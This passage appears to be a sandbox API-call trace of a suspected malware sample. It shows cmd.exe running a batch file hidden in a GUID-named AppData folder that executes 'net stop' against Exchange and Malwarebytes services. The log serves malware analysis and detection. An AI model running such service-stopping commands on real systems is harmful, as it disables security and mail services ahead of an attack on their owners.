lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0209.103] GetLastError () returned 0x2 [0209.103] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0209.103] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0209.104] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.104] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0209.104] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0209.104] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0209.104] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0209.104] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeES /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeES /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSExchangeES /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xa94, dwThreadId=0xa40)) returned 1 [0209.108] CloseHandle (hObject=0x74) returned 1 [0209.108] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0209.108] GetProcessHeap () returned 0x3e0000 [0209.108] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0209.108] GetEnvironmentStringsW () returned 0x3f8408* [0209.108] GetProcessHeap () returned 0x3e0000 [0209.108] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0209.108] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0209.108] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0209.237] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0209.237] CloseHandle (hObject=0x78) returned 1 [0209.237] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0209.238] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0209.238] GetProcessHeap () returned 0x3e0000 [0209.238] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0209.238] GetEnvironmentStringsW () returned 0x3f8408* [0209.238] GetProcessHeap () returned 0x3e0000 [0209.238] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0209.238] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0209.238] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0209.238] GetProcessHeap () returned 0x3e0000 [0209.238] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0209.238] GetEnvironmentStringsW () returned 0x3f8408* [0209.238] GetProcessHeap () returned 0x3e0000 [0209.238] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0209.239] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0209.239] GetProcessHeap () returned 0x3e0000 [0209.239] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0209.239] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0209.239] _get_osfhandle (_FileHandle=1) returned 0x264 [0209.239] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0209.239] _get_osfhandle (_FileHandle=1) returned 0x264 [0209.239] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0209.239] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0209.239] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0209.239] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0209.239] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0209.240] SetConsoleInputExeNameW () returned 0x1 [0209.240] GetConsoleOutputCP () returned 0x1b5 [0209.240] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0209.240] SetThreadUILanguage (LangId=0x0) returned 0x409 [0209.240] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0209.240] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0209.240] _get_osfhandle (_FileHandle=3) returned 0x78 [0209.240] SetFilePointer (in: hFile=0x78, lDistanceToMove=4566, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x11d6 [0209.240] GetProcessHeap () returned 0x3e0000 [0209.240] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0209.240] GetProcessHeap () returned 0x3e0000 [0209.240] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0209.240] GetProcessHeap () returned 0x3e0000 [0209.240] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0209.240] GetProcessHeap () returned 0x3e0000 [0209.240] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0209.240] GetProcessHeap () returned 0x3e0000 [0209.240] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0209.240] GetProcessHeap () returned 0x3e0000 [0209.240] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0209.240] GetProcessHeap () returned 0x3e0000 [0209.241] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0209.241] GetProcessHeap () returned 0x3e0000 [0209.241] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0209.241] GetProcessHeap () returned 0x3e0000 [0209.241] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0209.241] GetProcessHeap () returned 0x3e0000 [0209.241] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0209.241] GetProcessHeap () returned 0x3e0000 [0209.241] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0209.241] GetProcessHeap () returned 0x3e0000 [0209.241] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0209.241] GetProcessHeap () returned 0x3e0000 [0209.241] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0209.241] _get_osfhandle (_FileHandle=3) returned 0x78 [0209.241] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11d6 [0209.241] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x6eb, lpOverlapped=0x0) returned 1 [0209.241] SetFilePointer (in: hFile=0x78, lDistanceToMove=4591, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x11ef [0209.241] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=25, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MBAMService /y\r\n\n\r\n12 /y\r\neΓÇ¥ /y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 25 [0209.241] _get_osfhandle (_FileHandle=3) returned 0x78 [0209.242] GetFileType (hFile=0x78) returned 0x1 [0209.242] _get_osfhandle (_FileHandle=3) returned 0x78 [0209.242] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11ef [0209.242] GetProcessHeap () returned 0x3e0000 [0209.242] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0209.242] GetProcessHeap () returned 0x3e0000 [0209.242] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0209.245] _tell (_FileHandle=3) returned 4591 [0209.245] _close (_FileHandle=3) returned 0 [0209.245] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0209.245] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0209.245] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0209.245] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0209.245] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0209.245] _wcsicmp (_String1="net", _String2="CD") returned 11 [0209.245] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0209.245] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0209.245] _wcsicmp (_String1="net", _String2="REN") returned -4 [0209.245] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0209.246] _wcsicmp (_String1="net", _String2="SET") returned -5 [0209.246] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0209.246] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0209.246] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0209.246] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0209.246] _wcsicmp (_String1="net", _String2="MD") returned 1 [0209.246] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0209.246] _wcsicmp (_String1="net", _String2="RD") returned -4 [0209.246] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0209.246] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0209.246] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0209.246] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0209.246] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0209.246] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0209.246] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0209.246] _wcsicmp (_String1="net", _String2="VER") returned -8 [0209.246] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0209.246] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0209.246] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0209.246] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0209.246] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0209.246] _wcsicmp (_String1="net", _String2="START") returned -5 [0209.246] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0209.246] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0209.246] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0209.246] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0209.246] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0209.246] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0209.246] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0209.246] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0209.246] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0209.246] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0209.247] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0209.247] SetErrorMode (uMode=0x0) returned 0x1 [0209.247] GetProcessHeap () returned 0x3e0000 [0209.247] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0209.247] GetProcessHeap () returned 0x3e0000 [0209.247] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0209.247] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0209.247] GetProcessHeap () returned 0x3e0000 [0209.247] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0209.247] GetProcessHeap () returned 0x3e0000 [0209.247] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0209.248] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0209.248] GetProcessHeap () returned 0x3e0000 [0209.248] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0209.248] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0209.248] GetProcessHeap () returned 0x3e0000 [0209.248] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0209.248] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0209.248] GetProcessHeap () returned 0x3e0000 [0209.248] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0209.249] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0209.249] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0209.249] GetLastError () returned 0x2 [0209.249] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0209.250] GetLastError () returned 0x2 [0209.250] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0209.250] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0209.250] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0209.251] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0209.251] GetLastError () returned 0x2 [0209.251] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0209.251] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0209.252] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.252] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0209.252] SetErrorMode (uMode=0x0) returned 0x1 [0209.252] GetProcessHeap () returned 0x3e0000 [0209.252] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0209.252] GetProcessHeap () returned 0x3e0000 [0209.252] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0209.253] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0209.253] GetProcessHeap () returned 0x3e0000 [0209.253] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0209.253] GetProcessHeap () returned 0x3e0000 [0209.253] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0209.253] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0209.253] GetProcessHeap () returned 0x3e0000 [0209.253] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0209.253] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0209.253] GetProcessHeap () returned 0x3e0000 [0209.253] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0209.254] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0209.254] GetProcessHeap () returned 0x3e0000 [0209.254] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0209.254] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0209.254] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0209.255] GetLastError () returned 0x2 [0209.255] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0209.255] GetLastError () returned 0x2 [0209.255] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0209.256] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0209.256] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0209.256] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0209.256] GetLastError () returned 0x2 [0209.257] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0209.257] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0209.257] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.257] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0209.257] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0209.258] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0209.258] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0209.258] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MBAMService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MBAMService /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MBAMService /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xa48, dwThreadId=0xaa0)) returned 1 [0209.262] CloseHandle (hObject=0x78) returned 1 [0209.262] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0209.262] GetProcessHeap () returned 0x3e0000 [0209.262] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0209.262] GetEnvironmentStringsW () returned 0x3f8408* [0209.262] GetProcessHeap () returned 0x3e0000 [0209.262] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0209.263] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0209.263] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0209.424] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0209.426] CloseHandle (hObject=0x74) returned 1 [0209.426] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0209.426] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0209.426] GetProcessHeap () returned 0x3e0000 [0209.426] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0209.426] GetEnvironmentStringsW () returned 0x3f8408* [0209.426] GetProcessHeap () returned 0x3e0000 [0209.426] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0209.427] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0209.427] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0209.427] GetProcessHeap () returned 0x3e0000 [0209.427] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0209.427] GetEnvironmentStringsW () returned 0x3f8408* [0209.427] GetProcessHeap () returned 0x3e0000 [0209.427] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0209.427] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0209.427] GetProcessHeap () returned 0x3e0000 [0209.427] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0209.427] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0209.427] _get_osfhandle (_FileHandle=1) returned 0x264 [0209.427] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0209.427] _get_osfhandle (_FileHandle=1) returned 0x264 [0209.427] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0209.428] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0209.428] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0209.428] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0209.428] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0209.428] SetConsoleInputExeNameW () returned 0x1 [0209.428] GetConsoleOutputCP () returned 0x1b5 [0209.428] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0209.428] SetThreadUILanguage (LangId=0x0) returned 0x409 [0209.429] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0209.429] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0209.429] _get_osfhandle (_FileHandle=3) returned 0x74 [0209.429] SetFilePointer (in: hFile=0x74, lDistanceToMove=4591, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x11ef [0209.429] GetProcessHeap () returned 0x3e0000 [0209.429] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0209.429] GetProcessHeap () returned 0x3e0000 [0209.429] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0209.429] GetProcessHeap () returned 0x3e0000 [0209.429] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0209.429] 